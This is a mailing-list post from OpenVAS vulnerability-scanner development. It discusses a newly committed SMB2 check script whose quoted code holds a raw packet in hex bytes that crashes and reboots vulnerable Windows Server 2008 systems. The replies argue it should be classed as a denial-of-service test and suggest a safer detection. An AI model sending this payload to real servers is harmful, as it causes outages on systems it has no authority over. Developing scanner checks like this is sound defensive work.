[Openvas-devel] [Openvas-commits] r5349 - in trunk/openvas-plugins: . scripts

Tim Brown timb at openvas.org
Mon Oct 5 22:46:50 CEST 2009


On Monday 05 October 2009 20:59:07 you wrote:
> >    trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
> >
> > + script_category(ACT_GATHER_INFO);
> >
> > +data =
> > raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x
> >00,0x18,0x53,0xc8, +                 
> > 0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf
> >f,0xfe, +                 
> > 0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x5
> >7,0x4f, +                 
> > 0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0
> >0,0x02, +                 
> > 0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x6
> >4,0x6f, +                 
> > 0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x7
> >5,0x70, +                 
> > 0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x3
> >0,0x30, +                 
> > 0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4
> >e,0x54, +                 
> > 0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x3
> >2,0x2e, +                  0x30,0x30,0x32,0x00); # Tested against 2008
> > Server. A vulnerable Server doing a reboot. I'm not happy with that, but
> > a the moment i have no idea how to detect this vulnerability without
> > exploiting it. +
>
> I suspect this script should be classified as ACT_DENIAL
> rather than ACT_GATHER_INFO, given that it causes the
> vulnerable server to reboot.

The /safe/ version of the check would be just to check for SMBv2 support and 
flag it as a possible issue.  It's not perfect but AFAIk it is all that can 
be done at the moment.  You might also be able to fix up the packet so that 
it uses values that are unlikely to trigger the crash but I haven't 
investigated that in any detail.

Tim
-- 
Tim Brown
<mailto:timb at openvas.org>
<http://www.openvas.org/>


More information about the Openvas-devel mailing list